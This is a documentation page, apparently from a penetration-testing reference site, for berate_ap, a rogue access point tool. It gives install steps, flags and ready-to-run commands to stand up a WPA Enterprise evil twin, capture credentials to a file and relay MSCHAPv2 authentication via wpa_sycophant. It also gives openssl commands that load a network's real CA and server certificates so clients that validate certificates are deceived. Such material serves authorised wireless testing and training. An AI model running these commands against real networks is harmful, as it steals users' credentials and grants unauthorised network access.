> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# berate_ap

> Rogue AP framework with WPA Enterprise support: integrates with wpa_sycophant for MSCHAPv2 relay attacks and supports custom certificate loading.

## Overview

berate\_ap is a wrapper around hostapd that simplifies launching rogue access points. It integrates natively with wpa\_sycophant for relay attacks and supports loading custom TLS certificates for attacks against certificate-validating clients.

***

## Install

```bash theme={"dark"}
git clone https://github.com/sensepost/berate_ap.git
cd berate_ap
```

***

## Usage

```
./berate_ap [options] <interface> <bridge_iface> <ssid>
```

***

## Common Flags

| Flag                    | Description                                 |
| ----------------------- | ------------------------------------------- |
| `--eap`                 | Enable WPA Enterprise (EAP) mode            |
| `--mana-wpe`            | Enable credential capture (WPE)             |
| `--wpa-sycophant`       | Enable wpa\_sycophant relay integration     |
| `--mana-credout <file>` | Write captured credentials to file          |
| `--eap-cert-path <dir>` | Load custom TLS certificates from directory |

***

## WPA Enterprise Relay (with wpa\_sycophant)

```bash theme={"dark"}
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
  --mana-credout output.log \
  wlan1 lo <TARGET-SSID>
```

***

## Rogue AP with Custom Certificate

Used when the target client validates the server certificate. Requires the real CA and server certificate files converted to PEM.

```bash theme={"dark"}
openssl x509 -in ca.crt -out hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
```

```bash theme={"dark"}
./berate_ap --eap --mana-wpe --wpa-sycophant \
  --mana-credout output.log \
  --eap-cert-path /path/to/certs/ \
  wlan1 lo <TARGET-SSID>
```
